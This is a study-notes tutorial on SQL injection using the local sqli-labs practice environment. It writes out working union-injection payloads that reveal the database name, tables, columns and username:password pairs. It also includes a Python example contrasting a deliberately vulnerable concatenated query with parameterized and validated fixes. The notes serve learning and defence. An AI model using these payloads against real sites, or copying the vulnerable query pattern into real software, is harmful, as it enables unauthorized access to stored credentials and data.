SQL learning
1. Understanding SQL
What is SQL
What is SQL injection
SQL injection process
2. Union injection
Installation
1. Download PHP (already downloaded during the previous two study sessions).
2. Download sqli-labs-master.zip. After unpacking it, put it in the www directory of phpstudy_pro and run it.
Note: sqli-labs does not run under PHP 7; you need to set the PHP version of phpstudy_pro to 5. (Don't ask me why, I just know it.)
3. Edit the account and password in the sqli-labs/sql-connections/credb.inc file (set your own MySQL account and password).
4. Open http://localhost/sqli-labs-master or http://127.0.0.1/sqli-labs-master in the browser to reach the lab's start page.
Click "Setup/reset Database for labs"; the resulting page shows that the practice lab is set up.
Note: refer to the linked reference.
Suggestion for the practice lab: the Firefox browser with the HackBar extension is very convenient for working through the levels.
Practice lab, first level
1. Determine the closing delimiter
There are generally four closing delimiters: ', ", ') and "). Each is followed by the comment marker --+.
Input: ?id=1' --+ (then the same with ", ') and ") in place of ')
With ', the response shows that it is the correct closing delimiter.
Entering ?id=1, 2, 3, ... with different numbers returns different results.
2. Determine the number of columns
Use an order by clause to find out.
Input: ?id=1' order by 1 (or 2, 3, 4, ...) --+
Values 1 to 3 all echo normally, and an error is echoed at 4, which indicates that the number of columns is 3.
3. Union injection
Determine the echo position:
Input: ?id=0' union select 1,2,3 --+
The echo position is the second position.
Reveal the database name: because the echo position is the second position, replace the second value in the select list:
Input: ?id=0' union select 1,database(),3 --+
The database name is: security
Reveal the table names:
Input: ?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
The echo lists the table names.
Then reveal the column names of the users table:
Input: ?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
The echo lists the column names.
Finally, the field values:
Input: ?id=0' union select 1,group_concat(username,0x3a,password),3 from users --+
The echo lists the username:password pairs.
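
Why the closing-delimiter and union steps above work, and what stops them, as an added example that is not part of the original post or of sqli-labs. It assumes the level builds its query by pasting id between single quotes (consistent with the ' delimiter and the three columns found above), uses an in-memory SQLite table with constructed rows in place of the lab's MySQL database, and the function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the lab's 3-column users table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "constructed-pw-1"), (2, "bob", "constructed-pw-2")])
    return db

def lookup_vulnerable(db, user_id):
    # Assumed query shape: the id parameter is pasted between single quotes,
    # so a ' in the input ends the string and the rest is parsed as SQL.
    sql = "SELECT * FROM users WHERE id='" + user_id + "' LIMIT 0,1"
    return db.execute(sql).fetchone()

def lookup_parameterized(db, user_id):
    # The value is bound separately from the statement text; quotes inside
    # it are data and can never close the string or add a UNION.
    return db.execute("SELECT * FROM users WHERE id=? LIMIT 0,1",
                      (user_id,)).fetchone()

def lookup_validated(db, user_id):
    # Defence in depth: an id is a number, so reject anything else up front.
    if not user_id.isdigit():
        raise ValueError("id must be numeric")
    return lookup_parameterized(db, int(user_id))

# The echo-position test string from the walkthrough after URL decoding
# ("--+" reaches the server as "-- ").
PAYLOAD = "0' union select 1,2,3 -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable,    id=1    :", lookup_vulnerable(db, "1"))
    print("vulnerable,    payload :", lookup_vulnerable(db, PAYLOAD))
    print("parameterized, id=1    :", lookup_parameterized(db, "1"))
    print("parameterized, payload :", lookup_parameterized(db, PAYLOAD))
```

The union row (1, 2, 3) appears only in the concatenated version; with a bound parameter the whole string is compared as a value and matches nothing.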